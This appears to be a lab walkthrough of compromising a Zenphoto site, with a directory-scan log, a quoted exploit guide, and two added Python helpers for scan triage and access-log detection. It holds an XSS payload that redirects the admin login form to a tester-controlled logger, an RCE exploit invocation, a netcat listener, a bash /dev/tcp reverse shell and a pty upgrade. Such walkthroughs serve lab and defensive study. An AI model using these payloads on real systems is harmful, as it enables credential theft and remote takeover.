http [Initial-access]




Hidden Directory searching

Trying XSS exploit

Trying RCE exploit.



feroxbuster --url http://$zenphoto --filter-status 404 -x v1 -x v2

403 GET 10l 30w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 32w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 4l 5w 75c http://192.168.127.41/
200 GET 4l 5w 75c http://192.168.127.41/index
301 GET 9l 28w 315c http://192.168.127.41/test => http://192.168.127.41/test/
301 GET 9l 28w 323c http://192.168.127.41/test/plugins => http://192.168.127.41/test/plugins/
301 GET 9l 28w 322c http://192.168.127.41/test/themes => http://192.168.127.41/test/themes/
301 GET 9l 28w 321c http://192.168.127.41/test/cache => http://192.168.127.41/test/cache/
200 GET 101l 416w 5015c http://192.168.127.41/test/index
200 GET 0l 0w 0c http://192.168.127.41/test/themes/default/search
200 GET 0l 0w 0c http://192.168.127.41/test/themes/effervescence_plus/contact
200 GET 0l 0w 0c http://192.168.127.41/test/themes/garland/password
200 GET 0l 0w 0c http://192.168.127.41/test/themes/effervescence_plus/search
500 GET 0l 0w 0c http://192.168.127.41/test/themes/effervescence_plus/password
200 GET 0l 0w 0c http://192.168.127.41/test/themes/effervescence_plus/register
200 GET 0l 0w 0c http://192.168.127.41/test/themes/garland/register
200 GET 0l 0w 0c http://192.168.127.41/test/themes/garland/contact
200 GET 0l 0w 0c http://192.168.127.41/test/themes/zenpage/password
200 GET 0l 0w 0c http://192.168.127.41/test/themes/zenpage/contact
200 GET 0l 0w 0c http://192.168.127.41/test/themes/garland/news
500 GET 0l 0w 0c http://192.168.127.41/test/themes/effervescence_plus/news
200 GET 0l 0w 0c http://192.168.127.41/test/themes/zenpage/news
301 GET 9l 28w 348c http://192.168.127.41/test/themes/effervescence_plus/styles => http://192.168.127.41/test/themes/effervescence_plus/styles/
200 GET 0l 0w 0c http://192.168.127.41/test/themes/default/contact
200 GET 0l 0w 0c http://192.168.127.41/test/themes/garland/gallery
200 GET 0l 0w 0c http://192.168.127.41/test/themes/garland/pages
200 GET 0l 0w 0c http://192.168.127.41/test/themes/garland/archive
500 GET 0l 0w 0c http://192.168.127.41/test/themes/effervescence_plus/gallery
500 GET 0l 0w 0c http://192.168.127.41/test/themes/effervescence_plus/pages
200 GET 287l 571w 5173c http://192.168.127.41/test/themes/effervescence_plus/common
500 GET 0l 0w 0c http://192.168.127.41/test/themes/effervescence_plus/archive
200 GET 0l 0w 0c http://192.168.127.41/test/themes/garland/404
301 GET 9l 28w 337c http://192.168.127.41/test/themes/default/styles => http://192.168.127.41/test/themes/default/styles/
200 GET 0l 0w 0c http://192.168.127.41/test/themes/garland/image
500 GET 0l 0w 0c http://192.168.127.41/test/themes/effervescence_plus/404
200 GET 0l 0w 0c http://192.168.127.41/test/themes/default/register
500 GET 0l 0w 0c http://192.168.127.41/test/themes/garland/index
200 GET 0l 0w 0c http://192.168.127.41/test/themes/zenpage/gallery
200 GET 0l 0w 0c http://192.168.127.41/test/themes/default/password
200 GET 0l 0w 0c http://192.168.127.41/test/themes/zenpage/pages
200 GET 0l 0w 0c http://192.168.127.41/test/themes/garland/main
500 GET 0l 0w 0c http://192.168.127.41/test/themes/effervescence_plus/image
200 GET 0l 0w 0c http://192.168.127.41/test/themes/zenpage/archive
200 GET 0l 0w 0c http://192.168.127.41/test/themes/default/archive
500 GET 0l 0w 0c http://192.168.127.41/test/themes/effervescence_plus/index
200 GET 0l 0w 0c http://192.168.127.41/test/themes/default/404
500 GET 0l 0w 0c http://192.168.127.41/test/themes/garland/functions
200 GET 1311l 2475w 20218c http://192.168.127.41/test/themes/zenpage/style
200 GET 0l 0w 0c http://192.168.127.41/test/themes/default/image
200 GET 0l 0w 0c http://192.168.127.41/test/themes/stopdesign/gallery
200 GET 0l 0w 0c http://192.168.127.41/test/themes/default/index
200 GET 0l 0w 0c http://192.168.127.41/test/themes/zenpage/404
500 GET 0l 0w 0c http://192.168.127.41/test/themes/effervescence_plus/functions
200 GET 0l 0w 0c http://192.168.127.41/test/themes/zenpage/image
200 GET 0l 0w 0c http://192.168.127.41/test/themes/zenpage/index
200 GET 0l 0w 0c http://192.168.127.41/test/themes/garland/search
200 GET 0l 0w 0c http://192.168.127.41/test/themes/stopdesign/404
200 GET 70l 431w 34131c http://192.168.127.41/test/themes/garland/theme
200 GET 0l 0w 0c http://192.168.127.41/test/themes/garland/album
500 GET 4l 12w 181c http://192.168.127.41/test/themes/garland/slideshow
200 GET 0l 0w 0c http://192.168.127.41/test/themes/stopdesign/image
301 GET 9l 28w 330c http://192.168.127.41/test/themes/default => http://192.168.127.41/test/themes/default/
301 GET 9l 28w 337c http://192.168.127.41/test/themes/default/images => http://192.168.127.41/test/themes/default/images/
301 GET 9l 28w 341c http://192.168.127.41/test/themes/effervescence_plus => http://192.168.127.41/test/themes/effervescence_plus/
200 GET 42l 181w 14381c http://192.168.127.41/test/themes/default/theme
301 GET 9l 28w 348c http://192.168.127.41/test/themes/effervescence_plus/images => http://192.168.127.41/test/themes/effervescence_plus/images/
301 GET 9l 28w 349c http://192.168.127.41/test/themes/effervescence_plus/scripts => http://192.168.127.41/test/themes/effervescence_plus/scripts/
301 GET 9l 28w 337c http://192.168.127.41/test/themes/garland/images => http://192.168.127.41/test/themes/garland/images/
301 GET 9l 28w 330c http://192.168.127.41/test/themes/garland => http://192.168.127.41/test/themes/garland/
500 GET 0l 0w 0c http://192.168.127.41/test/themes/zenpage/functions
301 GET 9l 28w 322c http://192.168.127.41/test/albums => http://192.168.127.41/test/albums/
301 GET 9l 28w 333c http://192.168.127.41/test/themes/stopdesign => http://192.168.127.41/test/themes/stopdesign/
200 GET 0l 0w 0c http://192.168.127.41/test/themes/default/album
500 GET 4l 12w 181c http://192.168.127.41/test/themes/default/slideshow
200 GET 0l 0w 0c http://192.168.127.41/test/themes/effervescence_plus/album
500 GET 0l 0w 0c http://192.168.127.41/test/themes/effervescence_plus/slideshow
200 GET 61l 360w 33362c http://192.168.127.41/test/themes/zenpage/theme
200 GET 0l 0w 0c http://192.168.127.41/test/themes/zenpage/album
200 GET 1l 17w 209c http://192.168.127.41/test/themes/zenpage/footer
200 GET 176l 285w 3024c http://192.168.127.41/test/themes/zenpage/slideshow.css
301 GET 9l 28w 330c http://192.168.127.41/test/themes/zenpage => http://192.168.127.41/test/themes/zenpage/
200 GET 8l 16w 190c http://192.168.127.41/test/robots
500 GET 4l 16w 237c http://192.168.127.41/test/themes/zenpage/slideshow
200 GET 0l 0w 0c http://192.168.127.41/test/themes/stopdesign/album
500 GET 4l 12w 181c http://192.168.127.41/test/themes/stopdesign/slideshow
301 GET 9l 28w 324c http://192.168.127.41/test/uploaded => http://192.168.127.41/test/uploaded/
500 GET 0l 0w 0c http://192.168.127.41/test/themes/garland/sidebar
500 GET 7l 5w 50c http://192.168.127.41/test/themes/zenpage/sidebar
301 GET 9l 28w 323c http://192.168.127.41/test/zp-data => http://192.168.127.41/test/zp-data/
200 GET 0l 0w 0c http://192.168.127.41/test/zp-data/zp-config.php
200 GET 1l 2w 1518c http://192.168.127.41/test/favicon
301 GET 9l 28w 323c http://192.168.127.41/test/zp-core => http://192.168.127.41/test/zp-core/
200 GET 0l 0w 0c http://192.168.127.41/test/zp-core/password
301 GET 9l 28w 330c http://192.168.127.41/test/zp-core/images => http://192.168.127.41/test/zp-core/images/
200 GET 4l 16w 432c http://192.168.127.41/test/zp-core/images/bar_graph.png
200 GET 4l 17w 615c http://192.168.127.41/test/zp-core/images/folder.png
200 GET 4l 15w 874c http://192.168.127.41/test/zp-core/images/quest.png
200 GET 19l 26w 891c http://192.168.127.41/test/zp-core/images/admin-buttonback.jpg
200 GET 3l 8w 483c http://192.168.127.41/test/zp-core/images/page_white_copy.png
200 GET 7l 17w 1011c http://192.168.127.41/test/zp-core/images/edit-delete.png
200 GET 5l 11w 458c http://192.168.127.41/test/zp-core/images/pass.png
200 GET 7l 20w 997c http://192.168.127.41/test/zp-core/images/arrow_out.png
200 GET 6l 18w 1021c http://192.168.127.41/test/zp-core/images/arrow_in.png
200 GET 3l 12w 468c http://192.168.127.41/test/zp-core/images/accept.png
200 GET 14l 74w 6216c http://192.168.127.41/test/zp-core/images/icon_mail.png
200 GET 18l 82w 5937c http://192.168.127.41/test/zp-core/images/lock_open.png
200 GET 4l 14w 1207c http://192.168.127.41/test/zp-core/images/folder_picture.png
200 GET 4l 16w 1595c http://192.168.127.41/test/zp-core/images/thumb_standin.png
200 GET 8l 60w 3080c http://192.168.127.41/test/zp-core/images/zen-logo.png
200 GET 5l 14w 808c http://192.168.127.41/test/zp-core/images/envelope.png
500 GET 0l 0w 0c http://192.168.127.41/test/zp-core/rss/rss.php
500 GET 0l 0w 0c http://192.168.127.41/test/zp-core/rss/rss-comments.php
200 GET 15l 75w 5927c http://192.168.127.41/test/zp-core/images/toggleroh.png
200 GET 15l 73w 5312c http://192.168.127.41/test/zp-core/images/Zp.png
200 GET 15l 83w 6319c http://192.168.127.41/test/zp-core/images/comments-off.png
200 GET 14l 84w 5803c http://192.168.127.41/test/zp-core/images/magnify.png
200 GET 14l 72w 5003c http://192.168.127.41/test/zp-core/images/place_holder_icon.png
200 GET 10l 41w 1076c http://192.168.127.41/test/zp-core/images/comments-on.png
200 GET 5l 20w 1230c http://192.168.127.41/test/zp-core/images/pictures.png
200 GET 14l 88w 5966c http://192.168.127.41/test/zp-core/images/lock_2.png
200 GET 16l 61w 3622c http://192.168.127.41/test/zp-core/images/mask.png
200 GET 4l 12w 613c http://192.168.127.41/test/zp-core/images/arrow_up.png
200 GET 5l 11w 642c http://192.168.127.41/test/zp-core/images/warn.png
200 GET 6l 28w 1072c http://192.168.127.41/test/zp-core/images/marker.png
200 GET 4l 14w 931c http://192.168.127.41/test/zp-core/images/shape_handles.png
200 GET 6l 50w 1657c http://192.168.127.41/test/zp-core/images/view.png
200 GET 15l 78w 5962c http://192.168.127.41/test/zp-core/images/togglerc.png
200 GET 4l 20w 1203c http://192.168.127.41/test/zp-core/images/stock_copy.png
200 GET 44l 58w 1132c http://192.168.127.41/test/zp-core/images/admin-navtabback.jpg
200 GET 15l 82w 6034c http://192.168.127.41/test/zp-core/images/arrow_left_blue_round.png
200 GET 6l 14w 740c http://192.168.127.41/test/zp-core/images/searchfields_icon.png
200 GET 4l 12w 1083c http://192.168.127.41/test/zp-core/images/cache1.png
200 GET 19l 88w 6139c http://192.168.127.41/test/zp-core/images/refresh1.png
200 GET 5l 21w 1063c http://192.168.127.41/test/zp-core/images/lock.png
200 GET 6l 27w 1595c http://192.168.127.41/test/zp-core/images/select_files_button.png
200 GET 17l 88w 6186c http://192.168.127.41/test/zp-core/images/down.png
200 GET 3l 13w 957c http://192.168.127.41/test/zp-core/images/sortorder.png
200 GET 13l 60w 3867c http://192.168.127.41/test/zp-core/images/imageDefault.png
200 GET 10l 18w 877c http://192.168.127.41/test/zp-core/images/movie.jpg
200 GET 1l 2w 1518c http://192.168.127.41/test/zp-core/images/favicon.ico
200 GET 5l 27w 1706c http://192.168.127.41/test/zp-core/images/wpmini-blue.png
200 GET 3l 12w 549c http://192.168.127.41/test/zp-core/images/calendar.png
200 GET 10l 21w 634c http://192.168.127.41/test/zp-core/images/admin-headerback.jpg
200 GET 3l 12w 1111c http://192.168.127.41/test/zp-core/images/action.png
200 GET 5l 11w 279c http://192.168.127.41/test/zp-core/images/drag_handle.png
200 GET 7l 14w 444c http://192.168.127.41/test/zp-core/images/fail.png
200 GET 4l 9w 360c http://192.168.127.41/test/zp-core/images/reset.png
200 GET 3l 19w 983c http://192.168.127.41/test/zp-core/images/burst1.png
200 GET 7l 11w 1059c http://192.168.127.41/test/zp-core/images/admin-headlineback.jpg
200 GET 17l 40w 1985c http://192.168.127.41/test/zp-core/images/admin-boxback.jpg
200 GET 16l 81w 6084c http://192.168.127.41/test/zp-core/images/info_toggle.png
200 GET 16l 91w 6013c http://192.168.127.41/test/zp-core/images/folder_picture_dn.png
200 GET 7l 32w 828c http://192.168.127.41/test/zp-core/images/add.png
200 GET 17l 86w 5998c http://192.168.127.41/test/zp-core/images/pictures_dn.png
200 GET 6l 24w 1259c http://192.168.127.41/test/zp-core/images/icon_inactive.png
200 GET 17l 85w 6408c http://192.168.127.41/test/zp-core/images/edit-image.png
200 GET 15l 79w 5913c http://192.168.127.41/test/zp-core/images/togglerch.png
200 GET 15l 82w 6532c http://192.168.127.41/test/zp-core/images/reset_icon.png
200 GET 17l 85w 6136c http://192.168.127.41/test/zp-core/images/info.png
200 GET 6l 16w 846c http://192.168.127.41/test/zp-core/images/rss.png
200 GET 23l 77w 7962c http://192.168.127.41/test/zp-core/images/ajax-loader.gif
200 GET 57l 354w 20909c http://192.168.127.41/test/zp-core/images/wheel.png
200 GET 15l 76w 5964c http://192.168.127.41/test/zp-core/images/togglero.png
200 GET 19l 129w 10256c http://192.168.127.41/test/zp-core/images/err-cachewrite.png
200 GET 29l 124w 10031c http://192.168.127.41/test/zp-core/images/err-noflashplayer.png
200 GET 18l 79w 5364c http://192.168.127.41/test/zp-core/images/drag_handle_flag.png
200 GET 16l 82w 6044c http://192.168.127.41/test/zp-core/images/edit-album.png
200 GET 0l 0w 0c http://192.168.127.41/test/zp-core/archive
200 GET 74l 204w 3186c http://192.168.127.41/test/zp-core/admin
301 GET 9l 28w 327c http://192.168.127.41/test/zp-core/rss => http://192.168.127.41/test/zp-core/rss/
200 GET 3l 5w 101c http://192.168.127.41/test/zp-core/c
200 GET 19l 97w 8911c http://192.168.127.41/test/zp-core/images/err-imagegeneral.png
302 GET 0l 0w 0c http://192.168.127.41/test/zp-core/index => admin.php
200 GET 0l 0w 0c http://192.168.127.41/test/zp-core/functions
200 GET 901l 1840w 15491c http://192.168.127.41/test/themes/garland/zen
302 GET 0l 0w 0c http://192.168.127.41/test/zp-core/i => http://192.168.127.41/test/zp-core/images/err-imagenotfound.png
200 GET 75l 136w 1158c http://192.168.127.41/test/themes/effervescence_plus/slimbox
301 GET 9l 28w 333c http://192.168.127.41/test/zp-core/utilities => http://192.168.127.41/test/zp-core/utilities/
302 GET 0l 0w 0c http://192.168.127.41/test/zp-core/utilities/cache_images.php => http://192.168.127.41/test/zp-core/admin.php?from=/test/zp-core/utilities/cache_images.php
302 GET 0l 0w 0c http://192.168.127.41/test/zp-core/utilities/backup_restore.php => http://192.168.127.41/test/zp-core/admin.php?from=/test/zp-core/utilities/backup_restore.php
200 GET 15l 76w 6336c http://192.168.127.41/test/zp-core/locale/missing_flag.png
301 GET 9l 28w 330c http://192.168.127.41/test/zp-core/locale => http://192.168.127.41/test/zp-core/locale/
301 GET 9l 28w 343c http://192.168.127.41/test/themes/garland/contact_form => http://192.168.127.41/test/themes/garland/contact_form/
500 GET 0l 0w 0c http://192.168.127.41/test/zp-core/controller
301 GET 9l 28w 346c http://192.168.127.41/test/themes/stopdesign/contact_form => http://192.168.127.41/test/themes/stopdesign/contact_form/
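Reading a feroxbuster run of this size by hand is error-prone, so here is a small triage helper, added as an example and not part of the original notes or of feroxbuster itself. It parses the result-line format shown above (`STATUS METHOD <n>l <n>w <n>c URL [=> REDIRECT]`), skips the auto-filter notices, counts responses per status with the empty 0c bodies set aside, and lists the paths a reviewer of a Zenphoto install should look at first: the `zp-data` configuration store, the `zp-core/admin` entry point, the admin-only utilities, and anything that redirects into `admin.php`. The `SENSITIVE` fragment list and the `SAMPLE` excerpt (a handful of lines copied from the scan above) are this example's own choices.

```python
"""Triage helper for feroxbuster output (added example, not from the original notes)."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional

# One feroxbuster result line: STATUS METHOD <n>l <n>w <n>c URL [=> REDIRECT]
LINE_RE = re.compile(
    r"^(?P<status>\d{3})\s+(?P<method>[A-Z]+)\s+"
    r"(?P<lines>\d+)l\s+(?P<words>\d+)w\s+(?P<chars>\d+)c\s+"
    r"(?P<url>https?://\S+)(?:\s+=>\s+(?P<redirect>\S+))?"
)

# Path fragments worth a closer look on a Zenphoto install (this example's own list):
# the config store, the admin entry point and the admin-only utilities.
SENSITIVE = ("/zp-data/", "/zp-core/admin", "/zp-core/utilities/")

# Excerpt of the scan above, embedded so the helper runs offline.
SAMPLE = """\
404 GET 9l 32w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 4l 5w 75c http://192.168.127.41/
301 GET 9l 28w 315c http://192.168.127.41/test => http://192.168.127.41/test/
200 GET 0l 0w 0c http://192.168.127.41/test/themes/default/search
200 GET 0l 0w 0c http://192.168.127.41/test/zp-data/zp-config.php
200 GET 74l 204w 3186c http://192.168.127.41/test/zp-core/admin
302 GET 0l 0w 0c http://192.168.127.41/test/zp-core/index => admin.php
302 GET 0l 0w 0c http://192.168.127.41/test/zp-core/utilities/backup_restore.php => http://192.168.127.41/test/zp-core/admin.php?from=/test/zp-core/utilities/backup_restore.php
"""


@dataclass
class Hit:
    status: int
    method: str
    lines: int
    words: int
    chars: int
    url: str
    redirect: Optional[str]

    @property
    def path(self) -> str:
        # Strip scheme and host so paths compare regardless of the target IP.
        return re.sub(r"^https?://[^/]+", "", self.url)

    @property
    def interesting(self) -> bool:
        if any(frag in self.path for frag in SENSITIVE):
            return True
        # A redirect into admin.php means the resource sits behind the admin login.
        return self.redirect is not None and "admin.php" in self.redirect


def parse(text: str) -> List[Hit]:
    hits: List[Hit] = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # banner, auto-filter notice or unrelated text
        hits.append(Hit(int(m["status"]), m["method"], int(m["lines"]),
                        int(m["words"]), int(m["chars"]), m["url"], m["redirect"]))
    return hits


def status_counts(text: str, skip_empty: bool = True) -> Dict[int, int]:
    """Responses per status code; 0c bodies are usually 404-filter leakage."""
    return dict(Counter(h.status for h in parse(text)
                        if not (skip_empty and h.chars == 0)))


def triage(text: str) -> List[str]:
    """Paths to review first, deduplicated, in scan order."""
    seen, out = set(), []
    for h in parse(text):
        if h.interesting and h.path not in seen:
            seen.add(h.path)
            out.append(h.path)
    return out


if __name__ == "__main__":
    print(status_counts(SAMPLE))
    for p in triage(SAMPLE):
        print("review:", p)
```

Run it against the full scan by reading the feroxbuster output from a file instead of `SAMPLE`; the same helper can be re-run after hardening to confirm that `zp-data` and the utilities no longer answer.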
http://192.168.127.41/test/zp-core/admin

# How to use this exploit to take over a ZenPhoto website #
#+----------------------------------------------------------------+#
# #
# To use the XSS logger make the admin click this link: #
# #
#+--[code snippet - put this all in one line]--+ #
# http://victimsite.com/zp-core/admin.php?from="><script> #
# document.forms[0].action="[logged url]"; #
# </script><div id="lolpwnt #
#+--[ end of code snippet]--+ #
# #
# Replace [logger url] with the link to this PHP script #
# Make sure your log.txt is writable before doing this #
# On login the admins password will be saved to the file. #
# #
# The next exploit is used by simply giving the link to #
# this script to the admin. if he clicks it his password #
# will be changed automatically to "ownedbydusec" #
# #
# That's about it :) Enjoy! #

searchsploit -m 9166
mv 9166.txt 9166.php
python3 -m http.server 80

http://192.168.146.41/test/zp-core/admin?from="><script>document.forms[0].action="[http://192.168.45.166/9166.php]";</script><div id="lolpwnt

http://192.168.146.41/test/

searchsploit -m 18083

"POST {$path}zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n";

php 18083.php $zenphoto /test/

sudo rlwrap nc -lnvp 22

bash -c "bash -i >& /dev/tcp/192.168.45.166/22 0>&1"

(command -v python && python -c 'import pty; pty.spawn("/bin/bash");') || (command -v python3 && python3 -c 'import pty; pty.spawn("/bin/bash");')
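Both steps above leave a distinctive trace in the web server's access log: a `GET` to `zp-core/admin.php` whose `from` parameter carries markup instead of a return path, and a `POST` to the `ajaxfilemanager/ajax_create_folder.php` endpoint. The detection logic below is an added example for the defending side and is not part of the original notes or of Zenphoto; it assumes Apache combined log format, a marker list of its own choosing, and uses constructed log lines (a benign `from=` value mirroring the redirect seen in the scan, one injected `from=` value, one `POST` to the upload endpoint, and one unrelated request).

```python
"""Access-log rules for the two Zenphoto request patterns above (added example)."""
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" access-log line (assumed format for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# admin.php's "from" parameter is meant to carry a return path; markup or
# script in it is the reflected-XSS pattern shown in the write-up above.
SCRIPT_MARKERS = ("<script", "javascript:", "document.forms", "onerror=", '"><')

# Endpoint abused by the ajaxfilemanager RCE; any POST to it deserves an alert.
RCE_ENDPOINT = "/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php"

# Matches both the .php form and the extension-less form seen in the scan.
ADMIN_RE = re.compile(r"/zp-core/admin(?:\.php)?$")

# Constructed sample lines (not from a real server).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /test/zp-core/admin.php?from=/test/zp-core/utilities/backup_restore.php HTTP/1.1" 200 3186 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2024:10:02:15 +0000] "GET /test/zp-core/admin.php?from=%22%3E%3Cscript%3Edocument.forms%5B0%5D.action%3D%22http%3A%2F%2F203.0.113.10%2Flog.php%22%3B%3C%2Fscript%3E%3Cdiv%20id%3D%22x HTTP/1.1" 200 3240 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2024:10:03:40 +0000] "POST /test/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0" 200 12 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Mar/2024:10:04:01 +0000] "GET /test/themes/default/theme.css HTTP/1.1" 200 14381 "-" "Mozilla/5.0"
"""


def parse_line(line: str) -> Dict[str, str]:
    m = LOG_RE.match(line)
    return m.groupdict() if m else {}


def classify(line: str) -> List[str]:
    """Alert labels that apply to one access-log line (empty list if none)."""
    rec = parse_line(line)
    if not rec:
        return []
    alerts: List[str] = []
    parts = urlsplit(rec["target"])
    path = unquote(parts.path)
    if ADMIN_RE.search(path):
        for value in parse_qs(parts.query).get("from", []):
            # parse_qs decodes once; decode again to catch double-encoded payloads.
            decoded = unquote(value).lower()
            if any(marker in decoded for marker in SCRIPT_MARKERS):
                alerts.append("zenphoto-admin-from-xss")
                break
    if rec["method"] == "POST" and path.endswith(RCE_ENDPOINT):
        alerts.append("zenphoto-ajaxfilemanager-post")
    return alerts


def scan(log_text: str) -> List[Tuple[str, List[str]]]:
    """(client ip, alert labels) for every line that triggers at least one rule."""
    findings: List[Tuple[str, List[str]]] = []
    for line in log_text.splitlines():
        labels = classify(line)
        if labels:
            findings.append((parse_line(line)["ip"], labels))
    return findings


if __name__ == "__main__":
    for ip, labels in scan(SAMPLE_LOG):
        print(ip, ", ".join(labels))
```

The benign first line shows why the rule keys on markup rather than on the presence of `from=` alone: Zenphoto itself issues `admin.php?from=<path>` redirects, as the scan above recorded, so a plain path in that parameter is normal traffic.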